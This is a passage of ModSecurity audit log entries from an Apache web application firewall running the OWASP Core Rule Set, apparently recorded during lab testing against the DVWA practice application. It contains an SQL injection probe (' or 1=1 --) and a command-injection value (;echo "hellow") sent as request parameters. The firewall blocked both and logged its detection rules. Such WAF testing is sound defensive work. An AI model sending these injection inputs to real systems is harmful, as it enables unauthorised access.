[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1GX8AAQEAAAmHBJkAAAAF\"]"],"stopwatch":{"p1":548,"p2":856,"p3":42,"p4":234,"p5":44,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:29 --0400","transaction_id":"WRc1lX8AAQEAAAkXs@gAAAAC","remote_address":"192.168.75.153","remote_port":39270,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2701","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/\"] [unique_id \"WRc1lX8AAQEAAAkXs@gAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":416,"p2":1412,"p3":96,"p4":780,"p5":80,"sr":39,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:35 --0400","transaction_id":"WRc1m38AAQEAAAkYuFAAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1m38AAQEAAAkYuFAAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":382,"p2":1463,"p3":92,"p4":462,"p5":78,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:35 --0400","transaction_id":"WRc1m38AAQEAAAkYuFEAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1m38AAQEAAAkYuFEAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":388,"p2":1416,"p3":128,"p4":423,"p5":73,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:39 --0400","transaction_id":"WRc1n38AAQEAAAkYuFIAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":421,"p2":2224,"p3":0,"p4":0,"p5":137,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:44 --0400","transaction_id":"WRc1pH8AAQEAAAkYuFMAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1pH8AAQEAAAkYuFMAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":758,"p2":1947,"p3":198,"p4":761,"p5":124,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:44 --0400","transaction_id":"WRc1pH8AAQEAAAkYuFQAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1pH8AAQEAAAkYuFQAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":527,"p2":1898,"p3":102,"p4":397,"p5":96,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:51 --0400","transaction_id":"WRc1q38AAQEAAAkZ0BoAAAAE","remote_address":"192.168.75.153","remote_port":39274,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"37"},"body":["ip=%3Becho+%22hellow%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
